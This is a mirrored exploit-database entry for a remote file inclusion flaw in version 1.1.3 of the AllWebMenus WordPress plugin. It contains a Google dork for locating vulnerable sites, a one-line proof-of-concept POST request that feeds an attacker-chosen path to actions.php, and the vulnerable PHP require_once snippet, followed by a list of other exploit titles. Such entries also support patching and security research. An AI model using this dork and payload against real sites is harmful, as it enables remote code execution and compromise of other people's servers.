WordPress Plugin AllWebMenus 1.1.3 – Remote File Inclusion

Exploit Database
32 阅读

作者： Ben Schmidt

日期： 2011-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17861/

# Exploit Title: Allwebmenus WordPress Menu Plugin WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/
# Version: 1.1.3 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI"

---
Vulnerable Code
---
/** Loads the WordPress Environment and Template */
if (!isset($_POST["abspath"]))
die();
require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));

last Exploits
WordPress Plugin AllWebMenus 1.1.3 – Remote File Inclusion的更多信息

Alienvault Open Source SIEM (OSSIM) 4.1.2 – Multiple SQL Injections：
NEC UNIVERGE UM4730 < 11.8 - SQL Injection：
AtomCMS v2.0 – SQLi：
RISE 1.9 – ‘search’ SQL Injection：
Mailman 1.x > 2.1.23 – Cross Site Scripting (XSS)：
Subsonic 6.1.1 – Cross-Site Request Forgery / Cross-Site Scripting：
Orangescrum 1.6.1 – Multiple Vulnerabilities：
Cubic CMS – Multiple Vulnerabilities：